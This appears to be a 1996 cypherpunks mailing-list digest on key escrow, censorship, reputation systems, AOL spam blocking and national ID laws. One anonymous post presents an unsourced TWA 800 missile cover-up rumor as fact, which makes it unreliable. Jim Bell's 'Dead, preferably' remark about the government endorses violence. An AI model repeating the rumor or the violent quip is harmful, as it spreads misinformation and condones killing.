When the remailer is compromised the memory resident key is lost when the machine is switched off, and the owner refuses to release the key. Is this what you are proposing? It sounds like a cross between Matt's netescrow and Ross Anderson's eternity file system. Your penet database is being stored in a distributed file system, with shares, and the identity of the share holders is concealed. However the aim is not to prevent others censoring your publicly available writings, but to allow a second avenue of access only in the case of `mob cryptography'. This changes the system over storing the database encrypted on the remailer machine's own disk in these ways: 1. When the police shut down the remailer and ask the operator to hand over the key he can decline, but they can (theoretically) get the database from the netescrow, if they can convince enough share holders. If the police are unsuccessful (seems likely) does this offer the operator much solace in his jail time for contempt of court, to know that he has a vote of confidence in the moral correctness of his decision from a population of the net? Does it offer him any legal benefit? Are the share holders guilty of contempt also, does this lessen his guilt, and harshness of prosecution? (Remember that the share holders identity and location are unknown to the operator, in the netescrow model, if I remember rightly). I'm not sure how useful this part is, unless the possibility of `mob cryptography' is the desired feature. I'd have thought an individual remailer operator would be more likely to fold than a group of anonymous crypto-anarchists. 2. You could add the twist of an alternative duress key, that would stand a real chance of successfully nuking the database. More satisfying. > Police investigations might apply "angry mob cryptanalysis" to find > a sender - convincing a sizable number of operators that a crime had > been committed with some particular piece of traffic. 3. 
Negative comment on the system: TLAs have a vested interest in themselves being most of the share holders. True of the ownership of the current remailers also of course. Is the aim of allowing `mob cryptography' the desired feature? If so this is NAK, `Net Access to Keys'. Fine by me, as long as it's strongly voluntary :-) (And hence useless for its forced access purposes). NAK, is interesting in that it puts things to a vote, where the parties are anonymous, they are on the net, so it's a Net constituency that gets to vote. It seems less evil than GAK. However I still have problems with it: problem 1: subterfuge by TLAs, they'll try to become share holders in a big way, and preventing them from doing this seems difficult without Chaumian style is-a-person credentials, to prevent multiple voting. Even with is-a-person TLAs would then target the credential issuer. (Much the same as the TLAs are able to create fake credit histories, identities, and so on currently). Unless there is a way to do a decentralised web of trust implementation of an `is a person' credential in such a way that it is difficult for TLAs to target. Perhaps it would be simpler to require a certain amount of ecash be paid as a vote, set it high enough that no one can afford to abuse it, TLAs included. problem 2: free speech is free speech even if it's unpopular. The tyranny of the majority problem. Non-voluntary NAK forces peer review on every one, and just because some people's views rate badly in a lot of people's eyes, doesn't mean they should be punished. Perhaps this problem can be mitigated by constructing the shares such that 99% of `is a person' checked votes certifying that they believe they have evidence that the nym in question is in the throes of nuking a major city for a ransom. So what do cpunks think of Matt's `Oblivious Key Escrow', formulated as NAK coupled with either is-a-person, or pay per vote to eliminate the multiple voter problem. 
It would force accountability and openness on our spooks, they have to explain, document clearly, or at least present some real convincing arguments. At the same time it would provide an argument against GAK, all legitimate (in the public's eyes, what other opinions count, this is a democracy isn't it) law enforcement needs met. However these advantages are balanced against the tyranny of the majority problem, which is better than tyranny by unaccountable TLAs, but still a problem, Adam -- #!/bin/perl -sp0777i Message-ID: >I wonder how they are doing this? We know that the Germans allow full >internet access (don't they?), so they can't be using a filtering http >proxy. I guess they're blocking on IP number (and perhaps port). One ISP uses a filtering proxy which still can access xs4all, while blocking the HTTP port to www.xs4all.nl for their users. Others simply block the IP number. Of course, everyone still can use the mirror sites, the anonymizer, open proxies, free Lynx accounts and www-by-mail services. The prosecutors don't seem to understand that yet. >might be a good idea for xs4all to gather up all of their spare IP >numbers, and alias the lot on their web site - this would increase the >number of blocked addresses needed. They are already rotating IP numbers. :) From nobody at cypherpunks.ca Fri Sep 6 17:53:26 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sat, 7 Sep 1996 08:53:26 +0800 Subject: TWA 800 - Friendly Fire? Message-ID: <199609062048.NAA32689@abraham.cs.berkeley.edu> The latest rumor. The message came to me from a man who was Safety Chairman for the Airline Pilots Association for many years and he is considered an expert on safety. He would not ever spread idle rumor. In short, he is usually quite certain before saying anything! The following information about TWA Flight 800 was received this afternoon: (08-22-96 ) TWA flight 800 was shot down by a U.S. Navy guided missile ship which was in area W-105. 
W-105 is a Warning Area off the SouthEast coast of Long Island and is used by the military for missile firing and other military operations. Guided missile ships travel all over the world defending the US and they were conducting practice firings up over the top of a Navy P-3 radar plane who was on a Southwest heading about over the top of TWA 800. Evidently the missile is supposed to go over the top of the P-3 and the accuracy of the missile is being measured by instrumentation in the P-3. There was a USAir flight coming from the Southeast descending towards Providence, RI that had been cleared to 21,000 feet and the TWA 800 aircraft was restricted to 13,000 feet. The air traffic controller requested the USAir flight to turn on his landing lights with the idea that TWA might see his lights and identify him. At that point, he would clear the TWA flight to continue his climb. The P-3 was a non-beacon target (transponder OFF) flying southwest in the controlled airspace almost over TWA 800 and made NO calls to ATC. After the explosion, he continued his flight to the west and then called ATC and asked if they would like him to turn around and assist with the "accident!" You will remember that the first announcement about this accident came from the Pentagon. The spokesman mentioned that they were sending the Navy to the crash site. They immediately sent a Navy Captain who was replaced the next day by an Admiral. That Admiral is still on the scene. The FBI has conducted at least 3,000 eyewitness interviews and the NTSB has not been able to be a part of these interviews nor have any access to the contents of them. Some of those eyewitnesses reported seeing lights. Those were probably the landing lights of the USAir plane. It has been a cover-up from the word go. The NTSB is there in name ONLY. All announcements made by Mr. Bob Francis say absolutely nothing and notice that the FBI is always standing beside or behind Mr. 
Francis and it would appear that his job is to make sure that nothing is said that would give away "THE BIG SECRET!" It is time to end this farce and tell the public the real truth as to what happened to TWA 800. My source shall remain my own but the above information is true and I believe it will all become known soon. Now that all of you know the real truth. From declan at well.com Fri Sep 6 17:55:26 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 7 Sep 1996 08:55:26 +0800 Subject: Muckraker column Message-ID: Not sure it came through in my cut-and-paste, but the Muckraker column is of course by Brock Meeks and went up on the site today. -Declan From crypto at nas.edu Fri Sep 6 18:11:19 1996 From: crypto at nas.edu (CRYPTO) Date: Sat, 7 Sep 1996 09:11:19 +0800 Subject: Public briefing on the NRC cryptography policy report at... Message-ID: <9608068420.AA842055531@nas.edu> Subject: Public briefing on the NRC cryptography policy report at MIT on Sept 11 Cryptography's Role in Securing the Information Society A Public Briefing in Cambridge, Massachusetts Wednesday, September 11, 1996, 3:00-4:00 pm There will be a public briefing in Cambridge, Massachusetts by the National Research Council on this report. The briefing will be held at the Laboratory of Computer Science, MIT, Room NE43-518, 545 Technology Square, in Cambridge (off Main Street). Dr. Herbert Lin, study director for this report and senior staff officer of CSTB, will conduct the briefing. For further information, please contact Ron Rivest at (617) 253-6098 or rivest at theory.Ics.mit.edu. Pls post. From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 18:17:46 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 7 Sep 1996 09:17:46 +0800 Subject: Cellular phone tracing Message-ID: <01I96117UUVI9JDL62@mbcl.rutgers.edu> From comp.risks: Date: Mon, 2 Sep 1996 22:24:13 -0400 (EDT) From: glassman at sunsite.unc.edu Subject: FedEx monitoring of cellular phonecall locations [...] 
nowhere near either of those places, so I did not bother to mention my current location to the operator. The next day, Saturday, I called FedEx with the same cell phone from Blowing Rock to arrange the pickup. The operator immediately asked if I wanted them to come to the intersection that I had placed my call from the day before. Two days later, a FedEx operator confirmed that they are getting "new systems" at some locations that are able to record the locations from which cellular calls are placed. I have now asked Cellular One three times to explain to me why they do not tell subscribers that they pass this location information through the system, but to no avail. [...] ========== end fwd. From nobody at replay.com Fri Sep 6 18:18:01 1996 From: nobody at replay.com (Anonymous) Date: Sat, 7 Sep 1996 09:18:01 +0800 Subject: No Subject Message-ID: <199609062151.XAA18867@basement.replay.com> On 5 Sep 96 at 14:31, Anonymous wrote: > This can lead into a long argument about just _when_ violence is > initiated, where opinion is more important than fact, but IMO: Agreed, if you live in a world of fantasy.... > Mr. Bell, if he follows through on his scheme, *will* be initiating > violence. You urge us not to get into the argument about "just_when_violence is initiated" and proceed to state the "Mr. Bell... ...*will* be initiating violence". What is that English word? Dogmatic? Nahhh, there must be a more precise one. Please help me here... > There are two roads to take in life, convincing and coercing > others. Looters of all persuasions have always counted on that and it worked for them for thousands of years. > I worry that abuse of the very young and weak (for > now) anonymity system for the purpose of initiating, rather than > exposing, violence will lead to more government violence than we > already have. You could worry all you want, but your only way to assess whether or not it will happen is not through your feelings but through the use of your rational mind. 
Stop "feeling" and start thinking. > Perhaps I am wrong and there is no hope; but if so, > that means another revolution. Revolutions are very romantic > sounding, to those who have not been in a war. I suppose that this refers to AP. If so, go RTFM because your conclusions and the workings of AP are not compatible. AP would not lead to a war, per se. Neither a civil war. > I urge everyone to > read "Emancipating Slaves, Enslaving Free Men" by Jeffrey Rogers > Hummel for a look at what our last revolution got us (hint: it was > *not* less government). I urge you to have a look at what is at the root of the growth of govt. It is not things but ideas, basic premises about life and the interaction between individuals. Ultimately, basic premises about the nature of Man is what brought us more govt. To understand govt excess, you've got to understand what is into the brain of the govt peoples. jfa "One of these centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold :) Jean-Francois Avon DePompadour, Societe d'Importation Ltee Limoges porcelain, silverware and crystal JFA Technologies, R&D consultants physicists, technologists and engineers. PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From declan at well.com Fri Sep 6 18:22:38 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 7 Sep 1996 09:22:38 +0800 Subject: DC lock and key, from HotWired Message-ID: http://www.hotwired.com/muckraker/ Muckraker By Brock Meeks More DC Lock and Key The Clinton administration will unveil new encryption legislation, dubbed the Key Recovery Initiative, as early as 9 September, Muckraker has learned. 
The bill's title is an exercise in Orwellian redirection - nothing more than an attempt to make the threadbare "key escrow" encryption concept, which was spawned via the infamous Clipper Chip, more vanilla-sounding. The Key Recovery Initiative is political hardball, calculated to split an industry currently reluctant to bow to pressure from the FBI and the National Security Agency to voluntarily adopt the key escrow encryption scheme. In making its pitch, the White House is "offering some sweetheart deals to a number of companies," says an industry source familiar with the administration proposal. Those "sweetheart deals" involve relaxing export controls on encryption software only for certain industries - finance, insurance, and health care, industry sources say. Such a move essentially leaves companies such as Netscape isolated. It's a classic divide-and-conquer strategy. In return for relaxing the export controls, the White House will ask companies in the targeted industries to provide concrete assurances that they will endorse a government-devised system of "key recovery encryption" in which the decoding keys to any scrambled data are turned over to a "trusted third party." Those third parties, of course, must first be verified and approved by the government via as yet undefined criteria. The decoding keys made available under this plan would be accessible to any law enforcement agency that could prove to a judge that it needed them to carry out an investigation. If that ambiguous level of "proof" can be provided, your keys are handed over without debate or recourse on your part. The administration's legislation will propose a "framework" based on "a global key management infrastructure," according to a little-publicized statement released by the White House on 12 July. A spokesperson from the vice president's office confirmed that the legislation will be drawn from this outline. 
The bill is an attempt to forge alliances with US trading partners so that data can be accessed and decoded across international borders. The legislation's blueprint includes: - Liberalizing export controls for encryption products dealing with financial, insurance, and health-care data. - A standards-setting procedure for "key recovery systems and products" that will be "eligible for general export licenses," and standards for products that the government will buy. - Transfer of export control oversight from the State Department, which currently maintains that encryption technology is a "munition," to the Commerce Department. [...] From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 18:26:37 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 7 Sep 1996 09:26:37 +0800 Subject: Whistleblowing on the Internet Message-ID: <01I960XGNBDW9JDL62@mbcl.rutgers.edu> From: IN%"stewarts at ix.netcom.com" "Bill Stewart" 3-SEP-1996 06:43:40.27 I would note that most unions are mostly run by populists of various varieties, who are generally against individual liberties - whether liberal or conservative populist doesn't make any real difference in the long run. To me, Pat Buchanan and Adolf Hitler look rather similar. >While some unions are clearly run by and for thugs, some employers have >also hired thugs to attack union organizers, and both unions and employers >have convinced government thugs to attack their opponents, though unions >generally have convinced governments to write laws with fines attached, >while employers have often had actual Federal troops shooting union strikers, >and have had police refrain from defending strikers from attack. I object to union members getting beaten up for union membership, striking, etcetera, just as much as I object to members of any other non-governmental organization being beaten activity. 
But there's a difference between the right not to get beaten up and someone claiming that union membership - still less not working - isn't a perfectly legitimate reason for firing someone. The state should not be interfering in this matter, in either direction. >In a free market, there wouldn't be laws requiring or forbidding union >membership, and some unions would prosper by providing good service to their >members and to the employers that hire them, while others wouldn't. Quite.... but unions that survive under a free market will look a _lot_ different from today's unions. -Allen From mccoy at communities.com Fri Sep 6 18:32:47 1996 From: mccoy at communities.com (Jim McCoy) Date: Sat, 7 Sep 1996 09:32:47 +0800 Subject: Reputations Message-ID: gregburk at netcom.com (Greg Burk) writes: > mccoy at communities.com (Jim McCoy) writes: > > Greg Burk writes: [...] > > Go read Ender's Game by Orson Scott Card (a good book to read anyway :) > > and examine the nature of the computer network "discussion groups" he talks > > about: a classic example of reputation markets in many-to-many discussions. [...] > I have read it, a long time ago. Frankly, it's a spectacularly bad > example. He writes of the two child-protagonists gaining reputations as > great philosophers on a sort of Usenet. (At the time I believe OSC was a > member of Delphi, UNCLEORSON) > > Look around on the real Usenet. OSC could not have been more wrong. If you look closer you would probably be surprised to see things starting to move in this direction. As the number of participants has grown the "noise" in most newsgroups has grown to an unmanageable level. Now most newsreaders allow you to score authors or article threads so that you can keep individual reputation and interest files. 
I am actually an anomaly at my company, a collection of very net-savvy people, because I actually still participate in a few newsgroups; most of the interesting net discussions now take place on mailing lists which allow further reputation filtering (most mail agents have better and more flexible filters than news agents) and most bleeding-edge traffic happens in private mailing lists where one cannot even participate unless they have already established their reputation. If these lists were gatewayed to read-only newsgroups you would have what Card was talking about. > > > As an "asset", it is extremely non-liquid: > > > > > > How exactly would you "convert" your reputation into other capital? > > > Would you accept bribes and tell lies? Seems to me you would only get a > > > one-shot "conversion" and it couldn't possibly hope to equal your > > > investment. > > > > Tell that to Walter Cronkite, Siskel & Ebert, Moody's and others who have > > converted reputation capital into large piles of money [...] > > You don't seem to realize you are actually including at least one major > example of a counterfeit reputation here. > > I speak of Siskel & Ebert, whom I have caught at least once giving a > strikingly dishonest review. I had seen the movie (See You In The > Morning) on opening day, before they reviewed it. It stunk. No, this is just an example of how reputations are not global values, each reputation is modified by the perspective of the user. _You_ disagreed with the review and have probably used your experience to weight the values of future reviews by those particular reviewers. This is why there are hundreds of different sources of reviews for movies, people weight the recommendation given by the reviewer with > Conclusion: They knew it stunk, but for some reason I won't speculate on > they wanted to say they liked it so they misreported it, and covered > their butts with a review that would look mixed later but sound like a > rave now. 
I see a counterfeit reputation. Incorrect. One thought it was a good film and the other disagreed. You did not find it to be a good film and have since modified your weighting of the Siskel & Ebert reputation value to reflect this. It is highly improbable that there were any behind-the-scenes machinations between the movie backers and the reviewers: such a person has a value which is directly proportional to being viewed as impartial and once they have established a reputation the value in maintaining the reputation outweighs the value a potential briber could gain by trying to influence the review (nothing will drop the reputation faster than getting caught cheating, and a single reviewer does not have enough influence on the public to impact a film's box office returns enough to make the bribe worthwhile.) It is more likely that you just disagreed with the review and you have since learned your lesson and now seek multiple review sources or else switched to a different source for movie review information (dropping your personal weighting of Siskel & Ebert down below other sources.) > > No, I think that you just don't understand the mechanics of reputations and > > how they interact with the most important resource in most people's lives: > > time. > > I'm tempted to tit-for-tat, but I will not refute your points by telling > you you just don't understand. I guess I could have been more diplomatic, but it seems that you just do not understand that reputations are not a global value, rather they are a weighted value which is modified over time as the user seeks to determine a balance of raters and reviewers which most closely represents their particular viewpoints, interests, and experiences. There is no one single reputation which a given person has, all reputations are dependent upon the source of the reputation and the context in which that particular reputation is used. > > time. 
Instead of thinking of "reputation" look at it from the other end and > > consider the "attention marketplace." > > Fine, but resolving good vs counterfeit reputations takes time too. *Sigh* There is no such thing as a "counterfeit" reputation. When someone joins a network with a particular set of interests they will start off by finding a reputation service(s) which they think, through various channels ranging from advertisement to word of mouth, closely matches their interests and views. This is the only time that outright deception can influence a person and it is also the point at which deception is least profitable (because the deceiver will be easily revealed once the user compares the reputations with what they expect to see and because most new users will choose multiple services to perform comparison shopping.) There may even be reputation services which rate other reputation services to let people know how the service compares to its stated viewpoints and advertisements. A reputation service gains income by establishing a long-term relationship with the customer, so it is in the service's interests to maintain credibility with its users. If they do not then that reputation service will have a negative weighting depending on what the user is interested in, so the problem of correct vs. incorrect reputations will itself be handled by reputation services. An individual will have multiple reputations depending on which service is providing the reputation and the context in which the reputation is being used. "Tim May" may have a relatively high reputation in most services on cryptography and crypto-anarchy issues but this reputation will not apply to football predictions or articles posted to soc.culture.swedish. 
Someone may try to burn a reputation to pass off a false statement as truth, but this is as unlikely to work as it is for Peter Jennings to tell all of his viewers that this afternoon Bill Clinton appointed me his senior domestic policy advisor; people now have a wide variety of news and information sources to use for comparing the veracity of the statement, getting caught diminishes his reputation and this has a monetary value to him, and because his audience is larger due to his increased reputation there is a greater chance that others will investigate the matter and so his chance of getting caught is higher. > > Right now reputation markets have a > > limited presence on the internet (mostly through killfiles) because the > > tools required are not integrated into the tools used to browse the > > information. In time this will change. > > How? I ask for something more specific than In The Future Everything > Will Be Done Right. Version 0.1 (coming to a news server near you by the end of the year) will take the form of a service whereby you can subscribe to a usenet filtering service which will present your newsreader with a database of articles which have already been filtered by the reputation service to remove off-topic and "me too" posts (or perhaps based upon other filtering criteria.) The agency making this service possible will also sell to individuals or groups the ability to start their own service on this news host and perform whatever filtering they want, this will also include adaptive filters (if I can ever get the little bastards to use an internal weighting function which does not converge too quickly) which will attempt to learn the general weighting criteria are so that the people running reputation filtering need only update the filters occasionally and not score each and every posting. 
The hard part, and the part which is slowly gaining enough momentum to make this possible, is the integration of cryptographic signatures into messages so that one can determine the authenticity of a message and thereby assign a reputation value to a real identity instead of an easily forgeable email address. jim From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 18:35:25 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 7 Sep 1996 09:35:25 +0800 Subject: Edited Edupage, 5 Sep 1996 Message-ID: <01I961B37F9U9JDL62@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 5-SEP-1996 22:55:23.70 >************************************************************ >Edupage, 5 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >************************************************************ [...] >AOL BLOCKS JUNK MAIL SITES >America Online is blocking all electronic mail sent from five Internet sites >that have been used to send hundreds of thousands of unsolicited messages to >AOL customers. In turn, Cyber Promotions Inc., which is associated with >three of the sites, has accused America Online of hypocrisy for "censoring" >commercial messages sent from other sites but allowing AOL itself to sponsor >commercial promotions. AOL dismisses the charge as an "apples and oranges >comparison." (New York Times 5 Sep 96 C2) There's been a court suit to stop AOL from doing so, which appears to have gotten a temporary injunction to that effect... I'll forward the details. >CHINA SCREENS OUT "SPIRITUAL POLLUTION" ON THE NET >The Beijing government has begun blocking as many as 100 Internet sites that >offer material the government deems unsuitable for its citizens -- including >dissident viewpoints from Hong Kong and Taiwan, sites sponsored by U.S. 
>major media organizations such as CNN and the Washington Post, and sexually
>explicit sites such as Playboy and Penthouse. An official described the
>blocked sites as suspected purveyors of "spiritual pollution." (Wall Street
>Journal 5 Sep 96 B12)

Hmm... funny similarity between Chinese objections of "spiritual pollution" and ASEAN objections of "cultural" problems, isn't there?

[...]

>Edupage is written by John Gehl & Suzanne Douglas
>. Voice: 404-371-1853, Fax: 404-371-8057.
>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.
>************************************************************
>Edupage ... is what you've just finished reading. To subscribe to Edupage:
>send mail to: listproc at educom.unc.edu with the message: subscribe edupage
>Roy Lichtenstein (if your name is Roy Lichtenstein; otherwise, substitute
>your own name). ... To cancel, send a message to: listproc at educom.unc.edu
>with the message: unsubscribe edupage. (If you have subscription problems,
>send mail to manager at educom.unc.edu.)

From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 18:40:53 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Sat, 7 Sep 1996 09:40:53 +0800
Subject: Court challenge to AOL junk-mail blocks
Message-ID: <01I961K8307I9JDL62@mbcl.rutgers.edu>

I wouldn't personally use AOL in any event, but their use of their computers is their business. I do have some doubts as to whether AOL subscribers necessarily signed on for this - as noted on the list-managers list, a consent arrangement would thus be preferable. The other argument of the Cyber Promotions jerks is nonsense - how does AOL blocking affect the rest of the Internet?

-Allen

>PHILADELPHIA, Pa. (Sep 6, 1996 12:23 p.m. EDT) -- A federal judge has
>ordered America Online to stop blocking up to 1.8 million "junk" e-mail
>files flooding subscribers' electronic mailboxes daily from a
>Philadelphia marketing firm.

[...]

>Pending a trial tentatively scheduled for Nov. 12, U.S. District Judge
>Charles R. Weiner ordered AOL Thursday to lift the block on Cyber
>Promotions' mailings. Weiner is presiding over a suit Cyber Promotions
>Inc. filed accusing AOL of trying to drive it out of business.
>Cyber Promotions controls three of the five sites blocked by AOL. The
>others -- one that distributes software to create bulk e-mail lists and
>one that had sent out ads for Internet video porn -- were not affected
>by Weiner's order.
>AOL attorney David Phillips said the company was considering an appeal.
>He said AOL customers had been "complaining vociferously about Cyber
>Promotions' junk mail."
>Sanford A. Wallace, the president of Cyber Promotions, was pleased about
>the decision.
>"We feel that America Online has violated the civil rights of their
>members and has violated our rights to send e-mail through the Internet,
>which AOL does not own," he said.
>Although unsolicited mail sent through the post office in the United
>States is not considered illegal, the rules have yet to be defined in
>cyberspace. The larger services -- AOL, Prodigy and Compuserve -- all
>have policies forbidding mass junk mailings

From frissell at panix.com Fri Sep 6 18:45:25 1996
From: frissell at panix.com (Duncan Frissell)
Date: Sat, 7 Sep 1996 09:45:25 +0800
Subject: What is the EFF doing exactly?
Message-ID: <2.2.32.19960906224034.00aed230@panix.com>

>Indeed. It appears the Unabomber has taken away the privilege of
>dropping stamped mail weighing over 16ozs into street-side mailboxes.
>One is now instructed to take these packages to a post-office mail
>clerk for mailing.

So switch to Fedex. The P.O. gives lousy service anyway. Privatize.

DCF

From jimbell at pacifier.com Fri Sep 6 18:57:55 1996
From: jimbell at pacifier.com (jim bell)
Date: Sat, 7 Sep 1996 09:57:55 +0800
Subject: Doing away with govt.
people Message-ID: <199609062301.QAA18475@mail.pacifier.com> At 12:13 PM 9/6/96 -0700, Dale Thorn wrote: >Gee, if we could just prosecute "the govt." under auspices of the >"three strikes" legislation: > >Gehlen Deal MK/ULTRA >"That 'Bay of Pigs' thing" ZR/RIFLE >Watergate MH/CHAOS >Iran/Contra Phoenix Program >BCCI/BNL COINTELPRO >INSLAW Waco, etc. You've probably heard of the "RICO statute," or "Racketeer-Influenced and Corrupt Organizations" law. It's both criminal and civil: You're supposed to be able to bring a RICO lawsuit against an organization and get triple damages. Maybe somebody should try it and name the federal government as defendant...There's certainly plenty of evidence. >Just say "Three strikes and you're (what?)" "Dead," preferably. Jim Bell jimbell at pacifier.com From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 19:13:48 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 7 Sep 1996 10:13:48 +0800 Subject: More identification laws Message-ID: <01I960QKGRV49JDL62@mbcl.rutgers.edu> From: IN%"rre at weber.ucsd.edu" 2-SEP-1996 22:33:17.31 [The new welfare bill in the US has profound privacy implications and will require major new identification systems and databases. See the article on the front page of today's (9/2/96) New York Times for some details. (There's a bunch of useful Internet stuff in the business section too.) This issue of the Privacy Forum, which I've abridged and rearranged, includes three items on Social Security Numbers and another on fingerscanning. This is really it: pressures for universal identifiers are growing exponentially from a hundred directions as we speak. I wish I knew how to communicate the magnitude of it. If half the stuff currently being launched in this area really happens then the world is going to be completely different a year from now -- give it two if the system development projects choke as per usual on their overambition. 
I hope you're not sick of this topic, because you'll be hearing lots more about it this autumn. Educate, agitate, organize. Please. Speaking of which, I've also enclosed a note about a Privacy International web page on national identification cards.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Sun, 1 Sep 96 18:14 PDT From: privacy at vortex.com (PRIVACY Forum) Subject: PRIVACY Forum Digest V05 #16 PRIVACY Forum Digest Sunday, 1 September 1996 Volume 05 : Issue 16 ---------------------------------------------------------------------- Date: Fri, 30 Aug 1996 10:51:45 -0700 (PDT) From: jd at scn.org (Janeane Dubuar) Subject: NCSL ALERT: Driver's Licenses and Birth Certificates This alert came by mail from the National Conference of State Legislatures in Washington, D.C. I added an update which includes the names of House-Senate conferees. The federal immigration bill (H.R. 2202) is expected to emerge from conference committee some time during the first week of September. Now is the time to act. TOWARD A NATIONAL IDENTIFICATION CARD AND MORE RED TAPE: CONGRESS MANDATES CHANGES TO DRIVER'S LICENSES AND BIRTH CERTIFICATES On May 2, 1996, the U.S. Senate passed S. 1664 (now called H.R. 2202 - Senate version), a bill to reform illegal immigration, that proposes monumental changes to all driver's licenses and birth certificates (section 118). These changes will force most U.S. 
citizens to obtain and pay for new driver's licenses and birth certificates; compromise each citizen's right to privacy; violate state and local control over driver's licenses and birth certificates; and invite discrimination against minorities. The Congressional Budget Office estimates that the federal driver's license mandate alone will shift up to $20 million in costs to states and localities. The House also passed an immigration bill, H.R. 2202. The House bill does not contain the driver's license and birth certificate mandates. Both House and Senate immigration staff are currently reconciling the two bills in an informal conference committee. Phone calls to House and Senate Leadership are urgently needed to demand that the driver's license and birth certificate mandates be deleted from the final bill. What Does the Senate Version of H.R. 2202 Require? 1. Driver's Licenses - State driver's licenses and identification cards MUST CONTAIN THE APPLICANT'S SOCIAL SECURITY NUMBER. The federal government will also create new federal standards for the application process and design of all driver's licenses and ID cards. States that currently retain and verify an applicant's social security number but do not place the number on the cards are initially exempt from the social security number mandate. According to the American Association of Motor Vehicle Administrators, of the 38 states that do not require the social security number to be on their driver's licenses, only Massachusetts would qualify for this exemption; all other states would be required to place social security numbers on driver's licenses and ID cards. All states are required to conform to the other federal standards. States with cycles of renewal longer than six years must start October 1, 2006. After October 1, 2006, NO ONE may use a driver's license or ID card for identification purposes that does not meet these federal standards. 2. 
Birth Certificates - All birth certificates must be printed on federally-approved safety paper and be certified by the issuing agency. The federal government will also issue additional provisions requiring other security features in the future. Starting in 1999 (three years after the bill's enactment), birth certificates that do not meet these federal standards cannot be accepted by any federal agency or by any state or local agency that issues driver's licenses or ID cards. Who Needs a New Driver's License? Anyone who wants to use their driver's license as a valid form of identification after October 1, 2006. If you need to use a driver's license to vote, to apply for a passport, to qualify for a federal school loan, license, contract or public assistance program or to meet any other federal, state or local requirement you will need a new driver's license. Will I Have to Put My Social Security Number on My Driver's License? Yes. While most states currently give applicants the option of not using this number on their driver's license or prohibit its use outright, the new federal requirements will force almost every American to put their social security number on their license or ID card. Many citizens are concerned by laws that increase the circulation of their social security number. The social security number is a key which provides access to vital personal information, which could be misused if it fell into the wrong hands. Others believe that proposals making driver's licenses uniform, including social security numbers, are a significant step toward a national ID card. Finally, many minorities contend that they will be disproportionately affected by the new requirements because they will be asked to show their documents more often than other Americans. Who Needs a New Birth Certificate? Anyone who wants to use their birth certificate as a valid form of identification after October 1, 1999. 
If you need to use your birth certificate to establish citizenship, apply for or renew a driver's license, passport or other identification documents, obtain a marriage license, register to vote, change your name, or many other purposes you will need a new certificate. No matter how old you are, if you need to use your birth certificate it must conform to the new federal standards, otherwise it is invalid. Fees will almost certainly be charged for new birth certificates to pay for the new federal requirements. This will impose a significant hardship on elderly and low-income Americans.

THE DRIVER'S LICENSE AND BIRTH CERTIFICATE MANDATES IN ILLEGAL IMMIGRATION BILL H.R. 2202 (Senate) WILL...

...INCREASE SOCIAL SECURITY NUMBER FRAUD.

H.R. 2202 (Senate version) will require the vast majority of automobile drivers in the U.S. to put their social security numbers on their driver's licenses. In the future, whenever someone shows their driver's license they will also be exposing their social security number. With the social security number accessible to so many people, it will be relatively easy for someone to fraudulently use your social security number to assume your identity and gain access to your bank account, credit services, utility billing information, driving history, and other sources of personal information. This new federal law will compound and exacerbate a disturbing trend reported by banks and credit card companies that social security number-related fraud is already on the rise.

...INVADE PRIVACY AND THREATEN CIVIL LIBERTIES.

According to the Privacy Rights Clearinghouse, when social security numbers were first issued in 1936, the federal government assured the public that use of the numbers would be limited to social security programs. The driver's license and ID card provisions in H.R. 2202 (Senate version) violate this promise, and will dramatically increase the circulation of the social security number and its use as a national identifier.
Now more corporations, creditors, insurance companies, government officials and others will be able to get easier access to vast amounts of personal information that can be used to support marketing schemes, determine insurance and loan eligibility, gain an advantage in a lawsuit, etc. ...PREEMPT STATE LAWS AND SHIFT COSTS TO STATES AND LOCALITIES. According to the Automobile Association of America, 38 states do not require drivers to put their social security numbers on their driver's licenses. Legislation has been introduced in a number of states (including Mississippi and Hawaii) that require social security numbers on their driver's licenses to take the numbers off the card because of fraud and privacy problems. The new federal law would require all but Massachusetts to change their laws, taking this option away from the majority of the nation's drivers and limiting state authority to decide whether this policy is appropriate for their residents. The bill also gives the federal government wide latitude to develop new and more costly requirements for state driver's licenses, ID cards and birth certificates in the future. According to the Congressional Budget Office, the new unfunded federal mandates in the law will shift up to $20 million in costs to states and force states and localities to increase fees for birth certificates to pay for new federal requirements. ...LEAD TO A NATIONAL ID CARD THAT DISCRIMINATES AGAINST MINORITIES. By requiring states to tie the social security number to state-issued identification documents, the proposal marks a dramatic shift toward using the number as an identifier. Today's mandate that the states follow federal requirements in their identification documents will lead to tomorrow's mandate: that the federal government issue the identification documents itself to ensure uniformity and reliability. Make no mistake: this provision is a key building block for national identification documents, and the national ID card. 
